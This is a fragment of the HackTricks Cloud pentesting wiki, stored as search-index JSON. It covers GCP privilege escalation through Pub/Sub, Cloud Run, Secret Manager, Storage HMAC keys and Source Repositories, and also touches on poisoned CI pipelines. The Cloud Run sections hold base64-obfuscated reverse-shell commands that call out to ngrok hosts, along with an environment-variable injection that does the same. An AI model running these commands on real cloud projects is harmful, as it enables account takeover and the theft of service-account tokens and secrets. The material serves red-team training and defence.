(ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Orgpolicy Privesc » References","id":"1078","title":"References"},"1079":{"body":"Reading time: 2 minutes tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Pubsub Privesc » GCP - Pubsub Privesc","id":"1079","title":"GCP - Pubsub Privesc"},"108":{"body":"The users of an organization can be listed in https://github.com/orgs//people. In the information of each user you can see the teams the user is member of , and the repos the user has access to .","breadcrumbs":"Github Security » Basic Github Information » Users","id":"108","title":"Users"},"1080":{"body":"Get more information in: GCP - Pub/Sub Enum","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Pubsub Privesc » PubSub","id":"1080","title":"PubSub"},"1081":{"body":"The snapshots of topics contain the current unACKed messages and every message after it . You could create a snapshot of a topic to access all the messages , avoiding access the topic directly .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Pubsub Privesc » pubsub.snapshots.create","id":"1081","title":"pubsub.snapshots.create"},"1082":{"body":"Assign the pervious permissions to you.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Pubsub Privesc » pubsub.snapshots.setIamPolicy","id":"1082","title":"pubsub.snapshots.setIamPolicy"},"1083":{"body":"You can create a push subscription in a topic that will be sending all the received messages to the indicated URL","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Pubsub Privesc » pubsub.subscriptions.create","id":"1083","title":"pubsub.subscriptions.create"},"1084":{"body":"Set your own URL as push endpoint to steal the messages.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Pubsub Privesc » pubsub.subscriptions.update","id":"1084","title":"pubsub.subscriptions.update"},"1085":{"body":"Access messages using the subscription.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Pubsub Privesc » pubsub.subscriptions.consume","id":"1085","title":"pubsub.subscriptions.consume"},"1086":{"body":"Give yourself any of the preiovus permissions tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Pubsub Privesc » pubsub.subscriptions.setIamPolicy","id":"1086","title":"pubsub.subscriptions.setIamPolicy"},"1087":{"body":"Reading time: 2 minutes tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Resourcemanager Privesc » GCP - Resourcemanager Privesc","id":"1087","title":"GCP - Resourcemanager Privesc"},"1088":{"body":"","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Resourcemanager Privesc » resourcemanager","id":"1088","title":"resourcemanager"},"1089":{"body":"Like in the exploitation of iam.serviceAccounts.setIamPolicy, this permission allows you to modify your permissions against any resource at organization level. So, you can follow the same exploitation example.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Resourcemanager Privesc » resourcemanager.organizations.setIamPolicy","id":"1089","title":"resourcemanager.organizations.setIamPolicy"},"109":{"body":"Github offers different ways to authenticate to your account and perform actions on your behalf.","breadcrumbs":"Github Security » Basic Github Information » Github Authentication","id":"109","title":"Github Authentication"},"1090":{"body":"Like in the exploitation of iam.serviceAccounts.setIamPolicy, this permission allows you to modify your permissions against any resource at folder level. So, you can follow the same exploitation example.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Resourcemanager Privesc » resourcemanager.folders.setIamPolicy","id":"1090","title":"resourcemanager.folders.setIamPolicy"},"1091":{"body":"Like in the exploitation of iam.serviceAccounts.setIamPolicy, this permission allows you to modify your permissions against any resource at project level. So, you can follow the same exploitation example. tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Resourcemanager Privesc » resourcemanager.projects.setIamPolicy","id":"1091","title":"resourcemanager.projects.setIamPolicy"},"1092":{"body":"Reading time: 4 minutes tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Run Privesc » GCP - Run Privesc","id":"1092","title":"GCP - Run Privesc"},"1093":{"body":"For more information about Cloud Run check: GCP - Cloud Run Enum","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Run Privesc » Cloud Run","id":"1093","title":"Cloud Run"},"1094":{"body":"An attacker with these permissions to create a run service running arbitrary code (arbitrary Docker container), attach a Service Account to it, and make the code exfiltrate the Service Account token from the metadata . An exploit script for this method can be found here and the Docker image can be found here . Note that when using gcloud run deploy instead of just creating the service it needs the update permission . Check an example here .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Run Privesc » run.services.create , iam.serviceAccounts.actAs, run.routes.invoke","id":"1094","title":"run.services.create , iam.serviceAccounts.actAs, run.routes.invoke"},"1095":{"body":"Like the previous one but updating a service: bash # Launch some web server to listen in port 80 so the service works\\necho \\"python3 -m http.server 80;sh -i >& /dev/tcp/0.tcp.eu.ngrok.io/14348 0>&1\\" | base64\\n# cHl0aG9uMyAtbSBodHRwLnNlcnZlciA4MDtzaCAtaSA+JiAvZGV2L3RjcC8wLnRjcC5ldS5uZ3Jvay5pby8xNDM0OCAwPiYxCg== gcloud run deploy hacked \\\\\\n--image=ubuntu:22.04 \\\\ # Make sure to use an ubuntu version that includes python3\\n--command=bash \\\\\\n--args=\\"-c,echo cHl0aG9uMyAtbSBodHRwLnNlcnZlciA4MDtzaCAtaSA+JiAvZGV2L3RjcC8wLnRjcC5ldS5uZ3Jvay5pby8xNDM0OCAwPiYxCg== | base64 -d | bash\\" \\\\\\n--service-account=\\"-compute@developer.gserviceaccount.com\\" \\\\\\n--region=us-central1 \\\\\\n--allow-unauthenticated # If you don\'t have permissions to use \\"--allow-unauthenticated\\", dont use it","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Run Privesc » run.services.update , iam.serviceAccounts.actAs","id":"1095","title":"run.services.update , iam.serviceAccounts.actAs"},"1096":{"body":"Give yourself previous permissions over cloud Run.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Run Privesc » run.services.setIamPolicy","id":"1096","title":"run.services.setIamPolicy"},"1097":{"body":"Launch a job with a reverse shell to steal the service account indicated in the command. You can find an exploit here . bash gcloud beta run jobs create jab-cloudrun-3326 \\\\\\n--image=ubuntu:latest \\\\\\n--command=bash \\\\\\n--args=\\"-c,echo c2ggLWkgPiYgL2Rldi90Y3AvNC50Y3AuZXUubmdyb2suaW8vMTIxMzIgMD4mMQ== | base64 -d | bash\\" \\\\\\n--service-account=\\"@$PROJECT_ID.iam.gserviceaccount.com\\" \\\\\\n--region=us-central1","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Run Privesc » run.jobs.create, run.jobs.run, iam.serviceaccounts.actAs,(run.jobs.get)","id":"1097","title":"run.jobs.create, run.jobs.run, iam.serviceaccounts.actAs,(run.jobs.get)"},"1098":{"body":"Similar to the previous one it\'s possible to update a job and update the SA , the command and execute it : bash gcloud beta run jobs update hacked \\\\\\n--image=mubuntu:latest \\\\\\n--command=bash \\\\\\n--args=\\"-c,echo c2ggLWkgPiYgL2Rldi90Y3AvNy50Y3AuZXUubmdyb2suaW8vMTQ4NDEgMD4mMQ== | base64 -d | bash\\" \\\\\\n--service-account=-compute@developer.gserviceaccount.com \\\\\\n--region=us-central1 \\\\\\n--execute-now","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Run Privesc » run.jobs.update,run.jobs.run,iam.serviceaccounts.actAs,(run.jobs.get)","id":"1098","title":"run.jobs.update,run.jobs.run,iam.serviceaccounts.actAs,(run.jobs.get)"},"1099":{"body":"Give yourself the previous permissions over Cloud Jobs.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Run Privesc » run.jobs.setIamPolicy","id":"1099","title":"run.jobs.setIamPolicy"},"11":{"body":"The Poisoned Pipeline Execution (PPE) path exploits permissions in an SCM repository to manipulate a CI pipeline and execute harmful commands. Users with the necessary permissions can modify CI configuration files or other files used by the pipeline job to include malicious commands. This \\"poisons\\" the CI pipeline, leading to the execution of these malicious commands. For a malicious actor to be successful performing a PPE attack he needs to be able to: Have write access to the VCS platform , as usually pipelines are triggered when a push or a pull request is performed. (Check the VCS pentesting methodology for a summary of ways to get access). Note that sometimes an external PR count as \\"write access\\" . Even if he has write permissions, he needs to be sure he can modify the CI config file or other files the config is relying on . For this, he might need to be able to bypass branch protections . There are 3 PPE flavours: D-PPE : A Direct PPE attack occurs when the actor modifies the CI config file that is going to be executed. I-DDE : An Indirect PPE attack occurs when the actor modifies a file the CI config file that is going to be executed relays on (like a make file or a terraform config). Public PPE or 3PE : In some cases the pipelines can be triggered by users that doesn\'t have write access in the repo (and that might not even be part of the org) because they can send a PR. 3PE Command Injection : Usually, CI/CD pipelines will set environment variables with information about the PR . If that value can be controlled by an attacker (like the title of the PR) and is used in a dangerous place (like executing sh commands ), an attacker might inject commands in there .","breadcrumbs":"Pentesting CI/CD Methodology » PPE - Poisoned Pipeline Execution","id":"11","title":"PPE - Poisoned Pipeline Execution"},"110":{"body":"Accessing github.com you can login using your username and password (and a 2FA potentially ).","breadcrumbs":"Github Security » Basic Github Information » Web Access","id":"110","title":"Web Access"},"1100":{"body":"Abuse the env variables of a job execution to execute arbitrary code and get a reverse shell to dump the contents of the container (source code) and access the SA inside the metadata: bash gcloud beta run jobs execute job-name --region --update-env-vars=\\"PYTHONWARNINGS=all:0:antigravity.x:0:0,BROWSER=/bin/bash -c \'bash -i >& /dev/tcp/6.tcp.eu.ngrok.io/14195 0>&1\' #%s\\"","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Run Privesc » run.jobs.run, run.jobs.runWithOverrides, (run.jobs.get)","id":"1100","title":"run.jobs.run, run.jobs.runWithOverrides, (run.jobs.get)"},"1101":{"body":"https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/ tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Run Privesc » References","id":"1101","title":"References"},"1102":{"body":"Reading time: 2 minutes tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Secretmanager Privesc » GCP - Secretmanager Privesc","id":"1102","title":"GCP - Secretmanager Privesc"},"1103":{"body":"For more information about secretmanager: GCP - Secrets Manager Enum","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Secretmanager Privesc » secretmanager","id":"1103","title":"secretmanager"},"1104":{"body":"This give you access to read the secrets from the secret manager and maybe this could help to escalate privielegs (depending on which information is sotred inside the secret): bash # Get clear-text of version 1 of secret: \\"\\"\\ngcloud secrets versions access 1 --secret=\\"\\" As this is also a post exploitation technique it can be found in: GCP - Secretmanager Post Exploitation","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Secretmanager Privesc » secretmanager.versions.access","id":"1104","title":"secretmanager.versions.access"},"1105":{"body":"This give you access to give you access to read the secrets from the secret manager, like using: bash gcloud secrets add-iam-policy-binding \\\\ --member=\\"serviceAccount:@$PROJECT_ID.iam.gserviceaccount.com\\" \\\\ --role=\\"roles/secretmanager.secretAccessor\\" tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Secretmanager Privesc » secretmanager.secrets.setIamPolicy","id":"1105","title":"secretmanager.secrets.setIamPolicy"},"1106":{"body":"Reading time: 3 minutes tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Serviceusage Privesc » GCP - Serviceusage Privesc","id":"1106","title":"GCP - Serviceusage Privesc"},"1107":{"body":"The following permissions are useful to create and steal API keys, not this from the docs: An API key is a simple encrypted string that identifies an application without any principal . They are useful for accessing public data anonymously , and are used to associate API requests with your project for quota and billing . Therefore, with an API key you can make that company pay for your use of the API, but you won\'t be able to escalate privileges. To learn other permissions and ways to generate API keys check: GCP - Apikeys Privesc","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Serviceusage Privesc » serviceusage","id":"1107","title":"serviceusage"},"1108":{"body":"An undocumented API was found that can be used to create API keys: bash curl -XPOST \\"https://apikeys.clients6.google.com/v1/projects//apiKeys?access_token=$(gcloud auth print-access-token)\\"","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Serviceusage Privesc » serviceusage.apiKeys.create","id":"1108","title":"serviceusage.apiKeys.create"},"1109":{"body":"Another undocumented API was found for listing API keys that have already been created (the API keys appears in the response): bash curl \\"https://apikeys.clients6.google.com/v1/projects//apiKeys?access_token=$(gcloud auth print-access-token)\\"","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Serviceusage Privesc » serviceusage.apiKeys.list","id":"1109","title":"serviceusage.apiKeys.list"},"111":{"body":"You can configure your account with one or several public keys allowing the related private key to perform actions on your behalf. https://github.com/settings/keys GPG Keys You cannot impersonate the user with these keys but if you don\'t use it it might be possible that you get discover for sending commits without a signature . Learn more about vigilant mode here .","breadcrumbs":"Github Security » Basic Github Information » SSH Keys","id":"111","title":"SSH Keys"},"1110":{"body":"With these permissions an attacker can enable and use new services in the project. This could allow an attacker to enable service like admin or cloudidentity to try to access Workspace information, or other services to access interesting data.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Serviceusage Privesc » serviceusage.services.enable , serviceusage.services.use","id":"1110","title":"serviceusage.services.enable , serviceusage.services.use"},"1111":{"body":"https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/ Support HackTricks and get benefits! Do you work in a cybersecurity company ? Do you want to see your company advertised in HackTricks ? or do you want to have access the latest version of the PEASS or download HackTricks in PDF ? Check the SUBSCRIPTION PLANS ! Discover The PEASS Family , our collection of exclusive NFTs Get the official PEASS & HackTricks swag Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦 @carlospolopm . Share your hacking tricks submitting PRs to the hacktricks github repo **** . tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Serviceusage Privesc » References","id":"1111","title":"References"},"1112":{"body":"Reading time: 4 minutes tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Sourcerepos Privesc » GCP - Sourcerepos Privesc","id":"1112","title":"GCP - Sourcerepos Privesc"},"1113":{"body":"For more information about Source Repositories check: GCP - Source Repositories Enum","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Sourcerepos Privesc » Source Repositories","id":"1113","title":"Source Repositories"},"1114":{"body":"With this permission it\'s possible to download the repository locally: bash gcloud source repos clone --project=","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Sourcerepos Privesc » source.repos.get","id":"1114","title":"source.repos.get"},"1115":{"body":"A principal with this permission will be able to write code inside a repository cloned with gcloud source repos clone . But note that this permission cannot be attached to custom roles, so it must be given via a predefined role like: Owner Editor Source Repository Administrator (roles/source.admin) Source Repository Writer (roles/source.writer) To write just perform a regular git push .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Sourcerepos Privesc » source.repos.update","id":"1115","title":"source.repos.update"},"1116":{"body":"With this permission an attacker could grant himself the previous permissions.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Sourcerepos Privesc » source.repos.setIamPolicy","id":"1116","title":"source.repos.setIamPolicy"},"1117":{"body":"If the attacker has access to the secrets where the tokens are stored, he will be able to steal them. For more info about how to access a secret check: GCP - Secretmanager Privesc","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Sourcerepos Privesc » Secret access","id":"1117","title":"Secret access"},"1118":{"body":"It\'s possible to add ssh keys to the Source Repository project in the web console. It makes a post request to /v1/sshKeys:add and can be configured in https://source.cloud.google.com/user/ssh_keys Once your ssh key is set, you can access a repo with: bash git clone ssh://username@domain.com@source.developers.google.com:2022/p//r/ And then use git commands are per usual.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Sourcerepos Privesc » Add SSH keys","id":"1118","title":"Add SSH keys"},"1119":{"body":"It\'s possible to create manual credentials to access the Source Repositories: Clicking on the first link it will direct you to https://source.developers.google.com/auth/start?scopes=https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcloud-platform&state&authuser=3 Which will prompt an Oauth authorization prompt to give access to Google Cloud Development . So you will need either the credentials of the user or an open session in the browser for this. This will send you to a page with a bash script to execute and configure a git cookie in $HOME/.gitcookies Executing the script you can then use git clone, push... and it will work.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Sourcerepos Privesc » Manual Credentials","id":"1119","title":"Manual Credentials"},"112":{"body":"You can generate personal access token to give an application access to your account . When creating a personal access token the user needs to specify the permissions to token will have. https://github.com/settings/tokens","breadcrumbs":"Github Security » Basic Github Information » Personal Access Tokens","id":"112","title":"Personal Access Tokens"},"1120":{"body":"With this permission it\'s possible to disable Source Repositories default protection to not upload code containing Private Keys: bash gcloud source project-configs update --disable-pushblock You can also configure a different pub/sub topic or even disable it completely: bash gcloud source project-configs update --remove-topic=REMOVE_TOPIC\\ngcloud source project-configs update --remove-topic=UPDATE_TOPIC tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Sourcerepos Privesc » source.repos.updateProjectConfig","id":"1120","title":"source.repos.updateProjectConfig"},"1121":{"body":"Reading time: 7 minutes tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » GCP - Storage Privesc","id":"1121","title":"GCP - Storage Privesc"},"1122":{"body":"Basic Information: GCP - Storage Enum","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » Storage","id":"1122","title":"Storage"},"1123":{"body":"This permission allows you to download files stored inside Cloud Storage . This will potentially allow you to escalate privileges because in some occasions sensitive information is saved there . Moreover, some GCP services stores their information in buckets: GCP Composer : When you create a Composer Environment the code of all the DAGs will be saved inside a bucket . These tasks might contain interesting information inside of their code. GCR (Container Registry) : The image of the containers are stored inside buckets , which means that if you can read the buckets you will be able to download the images and search for leaks and/or source code .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » storage.objects.get","id":"1123","title":"storage.objects.get"},"1124":{"body":"You can give you permission to abuse any of the previous scenarios of this section .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » storage.objects.setIamPolicy","id":"1124","title":"storage.objects.setIamPolicy"},"1125":{"body":"For an example on how to modify permissions with this permission check this page: GCP - Public Buckets Privilege Escalation","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » storage.buckets.setIamPolicy","id":"1125","title":"storage.buckets.setIamPolicy"},"1126":{"body":"Cloud Storage\'s \\"interoperability\\" feature, designed for cross-cloud interactions like with AWS S3, involves the creation of HMAC keys for Service Accounts and users . An attacker can exploit this by generating an HMAC key for a Service Account with elevated privileges , thus escalating privileges within Cloud Storage . While user-associated HMAC keys are only retrievable via the web console, both the access and secret keys remain perpetually accessible , allowing for potential backup access storage. Conversely, Service Account-linked HMAC keys are API-accessible, but their access and secret keys are not retrievable post-creation, adding a layer of complexity for continuous access. bash # Create key\\ngsutil hmac create # You might need to execute this inside a VM instance ## If you have TROUBLES creating the HMAC key this was you can also do it contacting the API directly:\\nPROJECT_ID = \'$PROJECT_ID\'\\nTARGET_SERVICE_ACCOUNT = f\\"exam-storage-sa-read-flag-3@{PROJECT_ID}.iam.gserviceaccount.com\\"\\nACCESS_TOKEN = \\"$CLOUDSDK_AUTH_ACCESS_TOKEN\\"\\nimport requests\\nimport json\\nkey = requests.post( f\'https://www.googleapis.com/storage/v1/projects/{PROJECT_ID}/hmacKeys\', params={\'access_token\': ACCESS_TOKEN, \'serviceAccountEmail\': TARGET_SERVICE_ACCOUNT}\\n).json()\\n#print(json.dumps(key, indent=4))\\nprint(f\'ID: {key[\\"metadata\\"][\\"accessId\\"]}\')\\nprint(f\'Secret: {key[\\"secret\\"]}\') # Configure gsutil to use the HMAC key\\ngcloud config set pass_credentials_to_gsutil false\\ngsutil config -a # Use it\\ngsutil ls gs://[BUCKET_NAME] # Restore\\ngcloud config set pass_credentials_to_gsutil true Another exploit script for this method can be found here .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » storage.hmacKeys.create","id":"1126","title":"storage.hmacKeys.create"},"1127":{"body":"In order to create a new object inside a bucket you need storage.objects.create and, according to the docs , you need also storage.objects.delete to modify an existent object. A very common exploitation of buckets where you can write in cloud is in case the bucket is saving web server files , you might be able to store new code that will be used by the web application.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » storage.objects.create, storage.objects.delete = Storage Write permissions","id":"1127","title":"storage.objects.create, storage.objects.delete = Storage Write permissions"},"1128":{"body":"Composer is Apache Airflow managed inside GCP. It has several interesting features: It runs inside a GKE cluster , so the SA the cluster uses is accessible by the code running inside Composer All the components of a composer environments ( code of DAGs , plugins and data) are stores inside a GCP bucket. If the attacker has read and write permissions over it, he could monitor the bucket and whenever a DAG is created or updated, submit a backdoored version so the composer environment will get from the storage the backdoored version. You can find a PoC of this attack in the repo: https://github.com/carlospolop/Monitor-Backdoor-Composer-DAGs","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » Composer","id":"1128","title":"Composer"},"1129":{"body":"Cloud Functions code is stored in Storage and whenever a new version is created the code is pushed to the bucket and then the new container is build from this code. Therefore, overwriting the code before the new version gets built it\'s possible to make the cloud function execute arbitrary code . You can find a PoC of this attack in the repo: https://github.com/carlospolop/Monitor-Backdoor-Cloud-Functions","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » Cloud Functions","id":"1129","title":"Cloud Functions"},"113":{"body":"Oauth applications may ask you for permissions to access part of your github information or to impersonate you to perform some actions. A common example of this functionality is the login with github button you might find in some platforms. You can create your own Oauth applications in https://github.com/settings/developers You can see all the Oauth applications that has access to your account in https://github.com/settings/applications You can see the scopes that Oauth Apps can ask for in https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps You can see third party access of applications in an organization in https://github.com/organizations//settings/oauth_application_policy Some security recommendations : An OAuth App should always act as the authenticated GitHub user across all of GitHub (for example, when providing user notifications) and with access only to the specified scopes.. An OAuth App can be used as an identity provider by enabling a \\"Login with GitHub\\" for the authenticated user. Don\'t build an OAuth App if you want your application to act on a single repository . With the repo OAuth scope, OAuth Apps can act on _all _** of the authenticated user\'s repositorie**s. Don\'t build an OAuth App to act as an application for your team or company . OAuth Apps authenticate as a single user , so if one person creates an OAuth App for a company to use, and then they leave the company, no one else will have access to it. More in here .","breadcrumbs":"Github Security » Basic Github Information » Oauth Applications","id":"113","title":"Oauth Applications"},"1130":{"body":"AppEngine versions generate some data inside a bucket with the format name: staging..appspot.com. Inside this bucket, it\'s possible to find a folder called ae that will contain a folder per version of the AppEngine app and inside these folders it\'ll be possible to find the manifest.json file. This file contains a json with all the files that must be used to create the specific version. Moreover, it\'s possible to find the real names of the files, the URL to them inside the GCP bucket (the files inside the bucket changed their name for their sha1 hash) and the sha1 hash of each file. Note that it\'s not possible to pre-takeover this bucket because GCP users aren\'t authorized to generate buckets using the domain name appspot.com. However, with read & write access over this bucket, it\'s possible to escalate privileges to the SA attached to the App Engine version by monitoring the bucket and any time a change is performed (new version), modify the new version as fast as possible. This way, the container that gets created from this code will execute the backdoored code. The mentioned attack can be performed in a lot of different ways, all of them start by monitoring the staging..appspot.com bucket: Upload the complete new code of the AppEngine version to a different and available bucket and prepare a manifest.json file with the new bucket name and sha1 hashes of them . Then, when a new version is created inside the bucket, you just need to modify the manifest.json file and upload the malicious one. Upload a modified requirements.txt version that will use a the malicious dependencies code and update the manifest.json file with the new filename, URL and the hash of it. Upload a modified main.py or app.yaml file that will execute the malicious code and update the manifest.json file with the new filename, URL and the hash of it. You can find a PoC of this attack in the repo: https://github.com/carlospolop/Monitor-Backdoor-AppEngine","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » App Engine","id":"1130","title":"App Engine"},"1131":{"body":"Google Container Registry stores the images inside buckets, if you can write those buckets you might be able to move laterally to where those buckets are being run. The bucket used by GCR will have an URL similar to gs://.artifacts..appspot.com (The top level subdomains are specified here ). tip This service is deprecated so this attack is no longer useful. Moreover, Artifact Registry, the service that substitutes this one, does\'t store the images in buckets.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » 